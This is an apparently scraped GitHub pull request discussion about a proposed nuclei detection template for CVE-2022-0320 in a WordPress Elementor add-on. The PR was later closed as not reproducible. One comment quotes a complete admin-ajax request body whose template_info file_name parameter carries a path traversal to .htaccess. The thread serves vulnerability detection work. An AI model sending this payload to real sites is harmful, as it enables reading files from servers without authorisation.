nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

Create CVE-2022-0320.yaml

Open princechaddha opened this issue 2 years ago • 4 comments

Template / PR Information

  • Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
  • References:

Template Validation

I've validated this template locally?

  • [ ] YES
  • [ ] NO

Additional Details (leave it blank if not applicable)

Additional References:

princechaddha avatar May 11 '22 18:05 princechaddha

Hi @akincibor, in the request

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

There are some interesting parameters to check

  • page_id
  • widget_id
  • nonce

Can you explain, where do you get the value from these parameters?

Because I think its impossible to create the template because the attacker needs to find the page that contain post grid button first to get the value of page_id, widget_id, and nonce token and then you can request to wp-admin/admin-ajax.php

daffainfo avatar May 16 '22 14:05 daffainfo

But if someone makes a template to check the version, I think it's still possible :)

daffainfo avatar May 16 '22 14:05 daffainfo

You're right, I didn't pay attention to that.

akincibor avatar May 16 '22 14:05 akincibor

No problem bro, keep it up. I am always waiting for your template :))

daffainfo avatar May 16 '22 14:05 daffainfo

I am closing this PR due to inactivity and the team not being able to reproduce the CVE in this template

princechaddha avatar Oct 19 '22 09:10 princechaddha